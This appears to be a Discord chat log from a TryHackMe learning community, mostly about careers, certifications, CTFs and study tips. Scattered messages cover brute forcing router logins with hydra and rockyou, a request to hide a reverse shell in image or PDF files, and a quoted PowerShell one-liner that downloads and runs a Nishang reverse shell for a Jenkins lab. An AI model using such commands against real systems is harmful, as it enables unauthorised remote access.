#general
my b bro
Ah alright
Thanks for suggestions though at least @sand mason
Gave +1 Rep to @sand mason (current: #1344 - 3)
Does anyone know how to hack into router? I am trying to hack into admin access of my home router without knowing the password. I have tried few stuff but nothing seems to work. If anyone knows any good source i can follow then can you recommend it to me?
If it's your router, you can factory reset it.
hydra?
Ffuf would also work
If it's a leased router from the ISP, you are probably not legally allowed to hack it
I am doing this just for fun. I wanted to learn how to hack a router, to be more specific? So, yea reset isnt an option for me. lol
i tried to brute force with hydra but it didnt work
Unless you are confident in your wordlist, bruteforcing is a waste of time.
didn't work as in the password wasn't in the wordlist, or that it wasn't properly processing?
is it a login page or like a http auth user type deal?
i dont want to hack the router itself but was interested on how would one get into admin control of my router. i have changed the default password so i wanted to see if it is still possible to hack it some other way.
well you should be able to brute force it if the pw is in a wordlist. Even if it does some type of block via cookie, you can set hydra to create a new session for each attempt. Was the password in your wordlist?
any other vectors would be based off recon and enum for that specific system
i downloaded a wordlist called rockyou so i am not sure if it is in the wordlist or not. But i dont know how to create a new session for each attempt, so do you have any resources to help me teach it? I am doing this to learn new stuff so, please.
That's not going to help with your router bruteforce, unless the password is actually in there.
cat rockyou.txt | grep "<password-goes-here>"
For using a tool like hydra, the password actually has to be in the list you use. If you picked a strong password, the likelihood that it's in rockyou is very very very low.
or just add it in the top of the list/in a new file and try it where you know the password is in the list
other than that, you would have to do some type of a ruleset, like wordlist + mapping for more advanced brute forcing
changed the wifi password to asdf8842 to play around with that before
(note: that wasn't the password, tho same format)
chat when i say to my friends that i am into cyber security, they ask me to hack their ex's account 😭😭
what should i say
That it's illegal, and a violation of the account TOS.
tell them to move on
but is it really possible?
i always wanted to know, is there vulnerability exist in big companies to exploit and gain access
It's not a good area to explore. When you use those internet services, you don't actually own the account. It's not really yours. The TOS you agree specifically prohibits trying to access the account that way.
I didnt got it? can u explain in simpler way
i think recently facebook had a bug that granted access to a few of their servers with lateral movement. It's been patched, but the guy found it doing bug bounty
it happens but it's not common
Hacking account like social media = illegal. Don't do it.
also he was working within defined and legal scope, as I should probably point out
Yeah i wont do it, im more interested in bug bounties
and also, lets say if i learn to hack by some way, if i try it out on my account would it still be illegal
Step 1 to bug bounty: Make sure the company has a bug bounty program.
Step 2: Obey the rules of the bug bounty, including scope.
Step 3: ????
Step 4: repeat.
Yes. It would still be illegal.
Ohhkay
yes, bug bounties exist
and yeah one more question, i have mac, but i wanna do pentesting?
so should i use vmware fusion pro for parrotos/kali or mac is safe
only hack your own hardware/software that you have full rights to. if it's online, you don't own it and 99% don't have explicit permission (sans tryhackme/hackthebox)
Gott itt
HackerOne is my favorite out of the two
i got beef with hackerone
are this for bug bounties? or vulnerability research
they put my bug as a dupe when it's not possible for it to be one
bug bounties
also good vulnerability research
Doing pentest independently is not recommended. There's a lot of ways to get yourself in very deep legal trouble if you do not have a good lawyer and a very solid business plan. You are much better off working in other areas of IT to build your experience and knowledge before doing that.
ohhhkayy
bug bounties, but hackerone also has a learning + ctf subdomain
New fear unlocked
hacker101 i think
well im still learning
this........ isn't true, bug bounties exist and have "safe harbors"
if you mean as your own company that is kinda sketchy
Bug bounty is not pentest.
bug bounty is literally web pentesting
It's related but it's not quite the same thing.
i get what juun is saying, like you're not looking to actually get full blown shell in bug bounty
I'm involved with setting up bug bounty processes at the current company I work for, and I lead our pentest team. I also liaise with our 3rd party pentest vendors - the rules are different
at the most a PoC RCE
i'd just say its web pentesting with less scope
is mac good for learning pentesting and other tools
or a vm will be required for linux
any OS works fine
you can pentest solely on windows if you want
ohhkay
Can you guide me a path if you have any? it would be a great help
I would still recommend using a VM for all your pentest activities though. Whichever OS you test from, it's a somewhat common deliverable to hand over the VM image to the client. Wholly dependent on whether the client wants that as a value-add to the engagement.
portswigger academy -> dive into bug bounties and learn by doing, pwnfunction is a great resource on youtube as well
DVWA and metasploitable are great for learning. Or BWAPP too
My advice is to learn network or system administration first. Once you understand how to secure a device, you'll know good places to look for testing.
https://tryhackme.com/hacktivities
im doing from here currently
like, jr pentesting, web penting, advanced web pentesting then red teaming
is metasploit even used in actual engagements?
Second the portswigger once you have some knowledge. If the phrase 'CIDR notation' or 'IDOR' don't make sense, you probably aren't ready for pentest.
idk, but metasploitable is a system you run in a container that you can use to practice pentesting
not msfconsole
I've used metasploit in engagements. Not for webapp, but for network and other services.
fair i guess
but yeah i highly recommend pwnfunction, videos are somewhat short and teach you a lot and arent boring
any playlist?
i suppose you could use msfconsole tho. if it works it works, right?
all videos, theres like 20 or so
I'll add that I don't use it every engagement, and it's kind of a swiss army knife of a tool. It does a little bit of everything, but it makes certain things more difficult than they need to be. But it's a decent enough starting place.
some are kinda old, but its mostly conceptual and explanation
if im sure bug bounties are for web pentesting only right?
This chat is nice
not always!
some are hardware based
or app based
90% of the time they are web
Depends on the program, and what's in scope. You have to read the scope very carefully.
some of them are just stuff like code review
hello everyone
can anyone suggest me how to gain experience in cybersec becoz no company want to give job for fresher cybersec guy
find a helpdesk job first...work your way up
get into cybersec
What are the differences?
Yeah one- two years in help desk and you'll be on your way
Bug Bounty doesn't usually allow actual penetration into the target system beyond surface level. In most (but not all) BB programs, if you actually get a shell you have gone way beyond a simple demonstration of the vulnerability
Targets are also much more rigidly defined in bug bounty, with much less flexibility on scope.
can you suggest some help desk job ?
Ok that makes sense
hi
Yeah it’s just called help desk my friend. Just search for help desk
i am totally confused in my life !
It’s the entry level it job
I guess being a field tech is also another entry level it job
Data entry
I wouldn’t consider data entry an IT job
..
Heavily depends on the context. Data entry is important in IT.
If you have to have Technical Experience in IT to get a data entry position I'd consider it an IT position; Especially when it's in the context of a helpdesk, or any administrative role where you're a Data Entry Professional or wtv. I'd consider it an IT job.
Should I make any type of project college.
Does anyone have any idea about what type of project.
I think people forget there are multiple areas of IT. Not everyone is doing the hands on stuff. Sometimes you're just answering phones and helping those who are less technical operate their equipment. (Speaking in a HelpDesk Position GENERALLY speaking in Level 1 Support Role)
It all depends on what your role is within the company. People have their places, don't let someone deter you from applying to a data entry position.
And I wouldn't call that "IT" but it still counts as it somehow. (I know it's the premise but I find it mind blowing that sometimes simple explanations can be regarded as an IT service)
Yeah, I have experience in the hands on part.
And do you find it fun? I have a friend that keeps getting slammed w bitlocker unlock reqs
haha
but uh yeah, sometimes it's fun.
People don't understand what they want, It's a position you have to really be interested in.
I would love to be doing that back and forth
😭
For example you can work on laptops and various computer systems, one time I even helped build a bunch of computers for a company.
othertimes it's sucking the life out of you 😭
but mostly fun
at least in my opinion.
And that's fun, did you get to pick the parts?
or just assemble?
Actually a bit of both.
But running wire, oh that's a whole different story.
being there all day, from morning to dusk.
Wait until you have to relace it 
Then you have to deal with the old IT people's mistakes, look at it, start laughing uncontrollably, and then realize you're the one they hired to clean up that mess.
If you do it right, you don't need replace it for a really long time--unless somebody cuts the wire or does something laughably stupid.
..which is bound to happen eventually.
gn everyone
Goodnight! :3
I'm not talking ab that; more along the lines of having to trace cat6 using those wands 😭
all though that is quite fun, I'm sure it's hilarious to see the last person's unorganization 😭
afternoon!
I wanna learn something that i haven't, Can anyone teach me something that could be too beneficial for me to learn .. Umm?
I recently was studying on how to learn effectively on cybersecurity and I was curious on how you guys study it.
Practice, Patience & Experience..
yeah
i guess
but I speaking study techniques
I was learning on effective study techniques for cybersecurity and it made me stop using notes
so I was curious on how other people study and what techniques they use
i watch videos jerk it and do it rinse and repeat
anyone can tell me ....how to solve ctf ....any write ups for beginners ? @cedar hearth
then i write it on paper 12 times till it becomes engraved in my head and its the only thing i dream about
oh interesting
after that i think like im some greek philosopher about twtf i learned the day before
then i move on
huh
i guess so
typically I dont write on paper because it makes you forget faster
i passed my oscp cuz of it :/
thats why you write it more than once
but its not healthy tho
yeah
i cant talk to women anymore
i mean irl
hey mori
ok step 1
the reason why I think writing on paper is bad is because when you remember the knowledge and write it down you kinda let go of remembering it.
use the ai
then spend 1 hour googling what to do to achieve your goal
the tryhackme AI gives pretty good tips
im lazy making flashcards
and its not reliable
If I wanna get your experience. How can i.?
okay thanks
Gave +1 Rep to @primal obsidian (current: #2729 - 1)
i have 3 months of experience 💀
idk i just read stuff

then Where you learned most thing?
oscp course
do u have premium
no
I mean. Where you started when you started.?
that is very expensive
yea i saved up hella
idk like 2024
i worked very hard
im failing school rn
I am dropout from 11th 
dont gotta worry about school ig
Hell Yah.. It doesn't matter ig
ehhhh it kinda does when getting a job since a GED does look good
but then thats only entry
So. It doesn't matter for me, I Never want to do job ig...

what do u wanna do
become an illegal APT or smth??
The problem i am facing, Someone never had to do face ever.

what problem
<--
?
I guess just leave the personal problems... BTW can you teach me something that i can't learn somewhere else ?
sigh ok uhh
dont use CBC
🫶
Sometimes life is like this dark tunnel. You can't always see the light at the end of the tunnel, but if you just keep moving... you will come to a better place.
and cipher streams are faster than block streams
😭 I don't even know what are they
cipher modes
chacha over aes cuz its faster and no one is cracking either
🙃 🫶 ❤️
there you basically got your crypto basics on hardening ig
that light might come from the train entering
beware
Oh.. Got it!
😭
yea

uhhhhh
vmware is cool
i dual boot cuz im boss
I just uninstalled 17.6 and reinstalled 17.5
ok
My life ended up when i choose this industry as my life ig 
ok and
what about it


Scary huh!
i havent used vmware in like 4 months
Drink Drink..
youtube it or smth

vmware is well documented so gpt might help
Ohkie
BAAYI
can someone help with a bloodhound analysis
Someone think of an excuse for me
My family are trying to get me to go there today and I don’t wanna go
Does anyone know at what difficulty level SAL1 is compared to the SOC Simulator challenges?
Say for example, will it have alerts from easy, medium and hard, or only easy and medium?
You'll be using the SOC Sim, take from that what you will.
how can i join general vc it's locked
@obtuse swift
This review is good, without giving any important information about the test away; quite a long review but it's worth the watch https://youtu.be/nSrwoxHvHvA
Will check it out, thank you
Hi, I’m currently studying for the CompTIA Security+ SY0-701 exam using the CompTIA Security+ SY0-701 Certification Guide by Ian Neil, along with the CompTIA Security+ Exam Prep app by Than Hung. To increase my chances of passing, I’d like to add another resource, but I’m torn between Professor Messer’s Notes + Exam package and Jason Dion’s Udemy course. Which one would you recommend and why? Thank you.
A lot of people are recommending Professor Messer . Try to ask guys in #cyber-and-careers channel they can give you some great advice 🙂
Professor Messer, Always! <3
Gotta love when the burner dies
Planned on taking the burner (phone in picture) with me to China, but guess it's dead :/
looks like it need CPR
Yeah, the devs of the OS looks like to have remote wiped it, guess I just gonna install a new OS on it
Thanks
Gave +1 Rep to @cloud quiver (current: #1 - 3799)
Thanks
AFAIK, I don't think anybody does, as that would be really careless.
It's not graphene on it
It's some others that put their own stuff on top of graphene
Point still stands, if a dev has the ability to remote wipe a device, they have remote access.
I'll refer back to my blog post
https://zestfulzodiac.substack.com/p/from-secure-to-exposed-a-forensic
It's a drug phone OS i reverse engineered, it uses a subscription base, and if your subscription has run out for too long and they detect the phone being on afterwards they'll remote wipe it
So it's the app that does it.
Hi
Possibly
Hi! I'd like to participate in the Hackfinity Battle 2025 but I don't have a team! Anyone need a rookie for their team?
Going from the blog post, it's not quite a remote wipe, but more so a "safety" mechanism being used on the phone by the app, which could also have been done by dropping it, using a different cable etc.
please.
Do BTL1 holders get to do SAL1 for free? 👀
Yup, with restrictions.
#announcements message kind of
All information is in the post.
Yes, but this was caused by a remote wipe, you have a remote wipe token that if the phone gets sent in a notification or message it'll wipe itself, I have gone in and removed all instances of possibly getting it wiped by dropping and other methods they have, only way it could get wiped was if it was from their servers
That just leads to the question of you knew the phone was past the no subscription stage, why are you using it for a travel to a foreign country 😅
As a backup, didn't know they would wipe it past the subscription, but decided to bring it as a second for Chinese sim card and testing
Especially since I have had it turned on past subscription before where nothing happened
SYN'in til I ACK 🗣️ 💯
I cast firewall! 🧙♂️ 🔥
You just burned my securityOnion,
It was super effective.
Scrubz's character development needs to be studied
Is there anyone here who knows how to embed an cmd/ps/javascript/python reverse shell script that is executable into an jpg/png/pdf file ?
Stega something
Is it for THM ?
What are you doing? 😄
Hey scrubzzz

Hopefully for the right reasons. 😅
You help me advance and finish the first 3 modules and I got a job
But this is private project that I try now
Uh, what's the private project, that could depend on the community rules if we can assist you or not. 😄
I figured how to sort the port forwarding problem when trying to reverse shell outside of my local network , it works . And for educational purposes I want to check if I can make it work also when the script is being transferred as a jpg/png/pdf file
Is it going to run on a computer or a server ?
You may need to "fake" the png/jpg/pdf file, I'm not sure if you can run an executable from an image itself
I tried macros with pdf files but even with all defender off on windows , it is still alerting
Hey i'm new here
Well yes, that's considered maldev, quite normal windows defender will trigger
If you are trying to bypass windows defender this is another story, and I'll not help on that
I know there are ways to make it executable from image or pdf, I watched some online tutorials but they didn’t work
No im not trying to bypass it I already did, I am trying to make the working script being executed after op wining the image
After opening *
The executable will still be blocked from windows defender I think
Or at least, it should
No because the script itself is creating a cmd file that is creating a powershell file that executes itself therefore no need to downgrade ps execution policy
This I checked
Idk man this smells more and more like maldev and not a simple project
It’s for learning
Yeah, for tips and tricks on how to bypass defender, this is considered an advance topics,
yes you can kinda do js in pdf files
it's complicated
polyglots also exist and may be useful
Before going further, please respect rule 9.
If a pdf runs doom, it can run anything lol
Interesting
funnily enough i had the idea to do this before it released i just was too busy :/
That would be the discretion of Jabba.
in a sandbox
Nah man whoever did that is
1 crazy
2 unemployed
Lmao
Im glad to hear that, once you pass, you can get access to the advanced channels.
There is always a * at the end hehe
i was gonna make doom using mspaint as an IDE
also OSCP is windows?
i heard OSCP is much harder
if so i'm pretty sure id fail OSCP but would pass OSWE
It includes Windows
ahh
ooof
Top tip, (Not that I have OSCP)
Manage your time, and take breaks.
what do you mean
continue your projects man

gift me nitro bor
Don't just go guns blazing.
i gotta finally work on that project i've been meaning to do
get a job 
and hate myself doing it
i'm trying :(
im trying not to learn stuff that i dont have time to go in depth to
and in work they open me the OSCP libraries with more people and we learn together
like building a hypervisor and a mouse driver will totalllyyyygyyyy be fun
@sick lance is maldev still maldev if its ethical and safe? what classifies as maldev
If you have to ask, then best keep it in the advanced channels
so i have to wait for jabba to see if my cyber talk is good enough to get in
i could grind out thm but lazy
yeahhh :/ what's your niche in cyber?
everything :} about cybersecurity and computers
Good morning everyone!
Nano isn't on SO by default,
yay for vim
Maldev is maldev, in the case you are using it for ethical use it would fall under Ethical Maldev or Benign Malware an example of this could be Cobalt Strike Beacons
but my target is to master everything about (cyber warfare)
what about vm hardening with a rootkit
i dont know why but i loove it
oooh gl
Probably best asking a moderator or admin about that. not a community member who's just here, and as James pointed out, if you have to ask...
Depends on your use-case
good morning!!!
better malware-analysis on vm detection malware
start with C/C++ please
you will thank me later
did you start with that
i started with javascript and i regretted it
fair
i already learned C and start with python but it will be the next C++ and assembly after i will going deeper in cyber
that important to
Javascript,python are the easy get into cyber languages
i dont search for easy ways i want to understand everything dude
but learning C/C++ teaches you fundamentals about comp sci, which makes learning new languages easier
not only know how to work
As long as you're using it ethically, within legal regulations, and for legitimate reasons, it would generally be considered ethical malware development. However, you should always obtain proper authorization before deploying such software, unless otherwise explicitly permitted
that correct
you'll look at js and python and think they are terrible but will deeply understand them
now i learn python and its soo easy cuz i learned C before
yeah of course
yep, and you have info on data types etc
but in the first i will have some problems right with writing scripts
learning a new language after the first one is just syntax
after that feelings will gone right
i went from js -> python -> go -> c++ and it was horrible
I started off with Python. I might pick up c++
so it, it's so worth
you mean was so strong
Hmu with a c++ path and I'll get to work boss
yolo projects?
i think horrible road make you better ?
Whatever that will get me started. I'm about to sleep, not in the mood to search things lol
lol
i wouldn't say better in my case, when i switched to lower level it was very different than what i've done for years
that's why opposite i feel is better low level to high level
concepts are hard to learn at first
but everything's easier
with time and practice everything will be easy like you says:>
yeah it just takes time
thank you dude for advices
yeah i try to be better in C scripts also
can i say i think basic is before that 😄
make sure to learn about memory and stuff like that and not just scripting
data
honestly haven't touched BASIC
It's best to begin with the basics when you are first starting out, but then again it depends on your pathway
i i have finish this cs50 course 2 times
chat should I spend the rest of my day tomorrow hacking or coding
go get us the win in pico
and now to understand more everything i will finish it one time more
back in the late 80 start 90 i learn basic on my c64 😄
carry me my dude

Who's doing the new CTF?
I'm in two minds if I should take part or not, (bonus I'm a student).
ohhhh one of thoseeee
can we solve CTFs if we start new in cyber ?
why wont u participate
yes! i found them to be great at learning
hmmm what do you mean my ages heheh
I may have more fun watching from the server.
really
I would definitely suggest doing, even just as a learning experience
ok
😭 i only know of one of those from a museum here that shut down
Does anybody need one more student in their team for the hackfinity Battle?
they teach you new concepts and technologies etc, and you have to learn on the fly
#1347596231551225887 is a better channel.
Thank you
Gave +1 Rep to @sick lance (current: #2 - 3492)
10 print "hello world"
20 goto 10
run
which website bro
this CTFs
ok wait i remember this
you cant watch and play at the same time?
If I get too invested I won't. 😄
picoCTF is going on currently but a bit hard, picoGYM is 24/7 and teaches a lot
the thm one is going on idk for how long that's a scrubz question
i will look at that and come back
the CTF is not for my skills yet im to new in this
it is beginner friendly
even if you are brand new i would suggest giving it a try
then i need a team etc
if you don't know how to do it research as much as you can until you get it
if you don't plan on being competitive just do it solo
watch your place go up
yep
i leik big numbers go up
ok solo better i think for now just
after i learning more i will chose team to .....
@proper sable if ther is a dude the need a padawan im on 😄
?
i know it's a star wars reference but never seen 😭
You should tbh
I'm excited for the cloud challenges
if ther is some the like to be my teacher then i like to be the student
I have zero experience in those so I won't get them, but it'll be fun anyway
ahhh, i'm down to give advice when i can
might have to participate just for cloud stuff.......
i need an excuse to learn cloud
i have 0 experience on aws hacking
actually i have no experience in aws whatsoever
only experience i have on aws hacking is cognito cloud identities
cool can i add you on my friends list 😄
sure
im new in linux ish i know a litte and im trying the Penetration road on THM
Onion will know pain, for it no longer makes me cry by refusing to work!
T -1day for my 3d printer is coming home
scrubz villain ark
any new room ??
For THM, no.
What's this?
Security onion.
could you explain ?
It's a network security monitor.
With threat detection.
I don't use tor.
BTW.. how can i join that general vc.?
You need to verify your account
How can i.?
Above link.
just go and message the thm bot
Thanks!
Gave +1 Rep to @sick lance (current: #2 - 3493)
Im now a networking nerd
nice! 😊
safe flight bella!
Thankz
do we have a channel just for CTF
yes
Hey guys,
I’m a beginner pen tester from Egypt, and I’m looking to put together a small team to learn Pen Testing together, grind, and improve. The idea is simple: practice, hunt for bugs, do CTFs, and just keep getting better, learning on tryhackme website.
If you’re down to build something solid and actually put in the effort, hit me up. Let’s see where this takes us. 🔥
there is
??
cool how 😄
do you have a bar called get started ??
ohh where
thanx mate
thanx mate
wish you have a good learning sections
hell ya hehe i have no clue what to do soo game on
you could start with cyber security 101
ya it well might be a good idea i guess
@pseudo egret look like i need candy to eat and some more coffee
helloo
@dusty thicket hello there
what you doin
yha the caffeine rush
it would be fun
brb need to go shopping
where are you from ??
can't bro sorry but my mic is complaint
if you want hop in to dm
denmark you
Knew it from the name
well you might hear about greenland ;D
india
Well as a Dane myself it's a 7th sense
yo any from india ?
Yep
yo mate
hehe i love the rules on CTF ( you must not do that and that ) hmm all of that i dont know how to hehe soo that is the easy part 😄
Americaland? 
@gray sonnet @sturdy pike
Ye
This one
Hi..
Yo
Exiftool on Linux is not precise. I try cat it's more advanced
...Two different tools?
The quick brown fox jumps over the lazy dog
openvpn redad.ovpn
2025-03-09 19:11:42 Note: --cipher is not set. OpenVPN versions before 2.5 defaulted to BF-CBC as fallback when cipher negotiation failed in this case. If you need this fallback please add '--data-ciphers-fallback BF-CBC' to your configuration and/or add BF-CBC to --data-ciphers.
2025-03-09 19:11:42 Note: cipher 'AES-256-CBC' in --data-ciphers is not supported by ovpn-dco, disabling data channel offload.
2025-03-09 19:11:42 OpenVPN 2.6.13 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] [DCO]
2025-03-09 19:11:42 library versions: OpenSSL 3.4.1 11 Feb 2025, LZO 2.10
2025-03-09 19:11:42 DCO version: N/A
2025-03-09 19:11:42 OpenSSL: error:0480006C:PEM routines::no start line:Expecting: CERTIFICATE
2025-03-09 19:11:42 OpenSSL: error:0A080009:SSL routines::PEM lib:
2025-03-09 19:11:42 Cannot load inline certificate file
2025-03-09 19:11:42 Exiting due to fatal error
use sudo
root privileges
Yes
I'd appreciate it if you moved this to #site-support
moved it man
hi , i have a question , the data moves from layer 7 to 1 after before transmission via L1 . how the three way handshake occurs in transmission layer , before Network layer where you should know the ip address of the remote host?
are layers work together or work in order ;( im struggling in understanding :D
or im wrong in all what i said 😂
They work together
For a website, for example, you know the URL
The URL is broken down into a hostname
The hostname is resolved with DNS into an IP
HTTP request is sent to the IP+port
red white and blue land lol
hey, does anyone have suggestion for challenges to complete after finishing the cybersecurity 101 path?
Transmission begins at Layer 7 (Application) and moves down through each layer to Layer 1 (Physical). When using TCP, the three-way handshake occurs at Layer 4 (Transport); here, the client sends a SYN packet to the server, the server replies with a SYN-ACK packet, and the client responds with an ACK packet to establish the connection. While the process "moves down through each layer" it's more accurate to say that the layers work together rather than in a strict order to transmit data
This one 🙂
https://tryhackme.com/room/basicpentestingjt
thanks :)
lol
murica ppl
understood thank you
Gave +1 Rep to @naive violet (current: #3 - 2266)
all clear , thank you 🤠
I have a question, would you suggest moving onto the OpenVPN setup instead of Attack Boxes from the beginning or am i gonna encounter configuration issues on my kali? I mean, are there going to be lots of problems or is already set up for these kind of things??
I know i got the tools but maybe they got to be configured
I would definitely recommend you to use your own Kali vm . It has more tools pre-installed than AB . VPN setup is a relatively simple process. You can learn how to do it on the link below 🙂 .
https://tryhackme.com/room/openvpn
Alright, i've just done the metasploit introduction room on my own kali since it needs just some simple research for the tasks and it's a whole different story since metasploit loaded in less than 5 minutes 
hello
Hi man
Btw i have another thing, it's not THM related but on kali linux when i'm in discord and streaming my screen the audio gets all stuttering to the point where i cant hear nothing, has anyone had this problem before? On windows i havent got such problem and i dont know what could be causing it..
purple guy from the bite of '87
anyone knows about sha1 hash collision words
can't wait for the CTF to start
Linux's version of Discord is still lacking, some fixes off the top of my head could be turning off hardware acceleration or adjusting your audio sample rate but there are a few possible causes for the issue, so it may require some trial and error to find the right fix
which CTF
Where do i turn off hardware acceleration?
Discord Settings > Voice & Video > Hardware Acceleration
hey anyone know what vocabulary i should be using to think of a list of common applications and services found during pentests? things like jenkins, drupal, tomcat, etc?
do you recommend me that i install gawk?
CMS?
Depends if you need it or not, it's your software 😁
computer media services?
content management system
ahhhh
i've been trying to take pretty good notes for all these boxes and such i've been doing - it's good , in my opinion, to have some of these baddies ready to go
I love Tryhackme. Thank you so much for giving us this great gift of accessible knowledge well created.

I worked as customer service and tech support, don't call people idiot, because you can't explain yourself 😂
This is likely someone trying to help someone they know, and the person they're helping is likely just teasing them. This has been a common thread in Windows support for 30 years
When I read the first sentence I thought this conversation is doom 😂
t minus 200 days
I used to do tech support for a lot of old people, and then when I finished work, my mum used to call me with tech issues 😛 Actually is not that hard if you know how to guide them, ironically I had more success with old people than with young people. Young ones think they know everything and don't follow your instructions, if you know so much what the f you contact us 😂
i got 0xE yesterday 🎉
0XE
Expert right?
Guardian
🥦
🦖
smh smh...
I want to be like this
😭
I just end 49 rooms
Congrats , great job 🚀
SCaLE talk, misinformed
Your streak overflowed 🤣
LMAOO HAHAHAHA
just times 66 days more to have a nice streak
What's wrong with (Tr33r0otS!!) as a password?
haha streak -3
adding them to SecLists
From where u found it
this leetspeak is already in John rules configuration file
watching the video
Yo wahhht
"7r33r0075!!" would be a more accurate leetspeak variation of treeroots
is hackfinity starting on the 17th?
If that's what the event says.
the kid giving the talk is arguing for pass phrases
Maybe something related with planning 😉 😛
they succeeded in planning
what do you think of shellgpt
no thoughts
Hey everyone!
I can tell u something everyone
I lvu💕 u are beautiful u Are smart u are greatest
U are THE BESST ONE
YEEEA that's what im talking about
🥦
This for u everyone
anything with gpt on it, is a brain rot disease 😂
hmm oki 😄
Kinda needed it, thanks!
Have a cookie box 🍪 🥡
Gave +1 Rep to @leaden marsh (current: #2729 - 1)
Truth, I refuse to use all that crap
Totally forgot that this trip is on company card, plane wifi!!!
🥦
🍪
how are you doing sudo?
First time flying Qatar airways, I like it
🍪
i am true sudo
🦖
💕😁
they look warm, who's the other one?
i am sudo hex
you are so original
Hello sudo hex 👋
no idea, this image is from 404 media story
😄
What brings you to the TryHackMe community? 😁
I will put them in my blanket
lmao, that's warm
been
the blue team SOC level rooms
It's always hectic, studying and stuff
i found this discord server on the discovery page and i use tryhackme to help me learn cyber sec
🥱 I'm sleepy
Go sleep
Later everyone, wanted to talk but can't today
Awesome sauce 😎 Well I'm glad to have you here
Jabba
like a Flock of Seagulls ?
I am bored
thx :3 btw what skills would you think i need to complete the mr robot room?
Gave +1 Rep to @mossy river (current: #6 - 1520)
🏓
Not sure what to suggest
That's nice
its very bluey
At least I can scroll LinkedIn
ocean socks
lmfao
Hmm, you would need knowledge of CMS' using wordlists, I don't remember the room completely though 😓
Just your general web skills will do!
Jabba != Jobba
Jobba I'm stressed
oh wordlists ez
I was speaking to a friend of mine who was applying for a tier 1 SOC analyst role and they had people with 5 years of exp applying
haha
You're making me depressed
What's not for you, won't go past you.
well it depends where u live. I was talking about the UK
I am unaware how it is in other countries
Agree
I don't live in the UK and not comfortable enough to share
🌏 <--- you live here
Who knows, it might be the cookie land too
be the tough cookie we all hear about
sometime I feel I live in 🌑 😂
And share where I live? Or stop stressing out?
dark side of the moon
of course you don't otherwise you would be a biscuit 😉 😂
always dark as my soul 😛
Aye no, don't 😂
listening to Flock of Seagulls - I Ran since the Flocker user was in chat
think my comment went over their head
ill never forgive my self not going on pink floyd concert 😦
OWASP juice shop does not exist as VM alone?
👻 is typing
I would like a tool for turning an http request into something I can use with JavaScript's fetch. Like, take a request from the browser, and make the request object you need to give fetch
Burp ?
npm has such tools, think one is cereal ?
How long do you think it would take to learn and understand most of coding?
Which module? I'm trying to avoid intruder
depends
basics
I want something to pull into My own code
Any in particular?
I'm sorry, but I'm not seeing it?
you can search the ones you are wanting
Huh, I'd really guessed there'd be any tools at all for what I need
there likely is, but you said you wanted to code your own or use your code
No
I mean that, for My own code, I need a request in a specific format
I need a tool to turn a request into that format
I look at some really easy CTFs that require even the slightest amounts of javascript and legit feel so overwhelmed as I have no idea about that programming language, makes me understand how far I still have to reach.. How do you guys deal with this overwhelming feeling? I'm sure no matter how far this trip goes it still feels the same
I'd advise you learn JavaScript first, focussing on it as its own goal, because it's a whole different ball game
Would you vouch for any sources out there?
Json, I think? Probably. I just need a request as json
Sure would! JavaScript.info is amazing. And if you have questions, I'm happy to assist you
Hah, that's actually real nice. Thanks pal!
Gave +1 Rep to @plush forge (current: #2729 - 1)
No problem, Happy to help more people get into code
"powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port " obviously i have the doodads filled in but i'm getting the response that 'INvoke-PowerShellTcp is not an internal or external cmdlet ?
I hate geometry so much
what are u trying to do?
get a nishang script onto jenkins, then have jenkins invoke it
got the script on there via a http.server
THM team has big plans
even other walk throughs i've seen all have the same command..tried Invoke-Item , etc other cmdlets..nothing working. gonna take a break and try again from the beginning later
dude i didn't +x the script

What are you doing?
re-doing the jenkins room after several months away from the keyboard
been working on this exploit for like an hour - and realized i didn't chmod +x the script
Ah, #room-help if you need help.
totes ma gotes forgot i can use the search too to find specifics
Random Chinese dude sends me a text, no idea what it said, or who it's from.. guy asks:
"Are you free to go eat Korean food with me tomorrow at noon?"
Well, don't be rude, are you?
will be rude from you if not
I remember a random text, something along the lines of
Rando: "Hi I'm X, how are you?"
Me: "Fine"
Rando: "You're very kind, how old are you?"
Me: "Classified"
Rando: "Whats your name?"
Me: "Do you like feet?"
Rando:
Me: "Well do you?"
do you like korean food? a free meal is a free meal 😉 😛
@uneven hedge please don't post e-mails in this server, if you think it's spam, just ignore it.
I am interested in Security Analyst Level 1 (SLA1). I saw that you can take the exam for free if you have Security+ and Cysa+, is that true?
Bruh moment
BTL1 and/or CySa+.
Got the interaction wrong, got the texts though
It was very... religious type shit
In that case, I must be reading it wrong. Where do I find that information on the website? I can't seem to find it. I think I'm having a tunnel vision
Argggg. Script- either do as I demand, give me a proper error, or perish
sup
My code isn't working :(
Which code?
Hermione if it was cybersec instead of wizardry
Please never compare me to a Harry Potter character ever again
Trying to make a JavaScript brute forcer. Because This site has some quirks that make conventional tools useless, and I'm not running four thousand passwords through burp suite community edition
Probably be faster with python.
Okay, Chris Hemsworth from Whitehat
You'd probably be finished by now, since you can't get js to work. 😄
Because fetch
You're assuming that I'd get python working
Burp has "copy as python requests" as an extension, makes it uber easy
ffuf is good at multithreading
I'd rather use ZAP than FFuF for passwords though.
why?
ooh
i might need to install zap- can either look at the response and use that as the determining factor for success or failure?
@sick lance Are there any online degrees on cybersec?
this kind of thing is how a lot of pig butchering scams start.
I have no idea about your area, so you'd probably be better off Googling
oh good, now my target website is refusing to load. (not in a bugged way just in a slow way)
I see the cult grows for a member who isn't even here.
Oh no, not my area, a general catalogue if you know of some, that'd be really helpful
I've met her on another server
Well, who am I to judge
on the one hand, this challenge is making me very annoyed. on the other, that just makes me want to solve it more
as soon as my vm stops being slow
I'm assuming you based that on their pfp?
@boreal scarab would say not a cult 😛
He's allowed an opinion, doesn't mean it's correct. 😄
Can you tell me about the online degrees/courses if there are any?
I only know of OpenUniversity, which may be UK only, I don't know.
I think is international, we have open university in Israel too 🙂
hmf. i think i should put this ctf aside for now
Yeah
Do you wanna join aswell?
Scrubz | Fluff Clan
No thank you. 😄
who is fluff?
FluffMe is an old Community member, mentor and moderator.
@sturdy pike whats fluff clan? 🤔
CLAN!
Thank you. I definitely had tunnel vision. Never thought it would be in other channel
Gave +1 Rep to @sick lance (current: #2 - 3494)
I will study tryhackme after the course
Pig butchering scam 
Never heard that before
No worries, sometimes even I have to search for stuff, it can be overwhelming for members to find their way around.
it's a cult dedicated to a former THM community moderator
🤷♂️
interesting
Not...really?

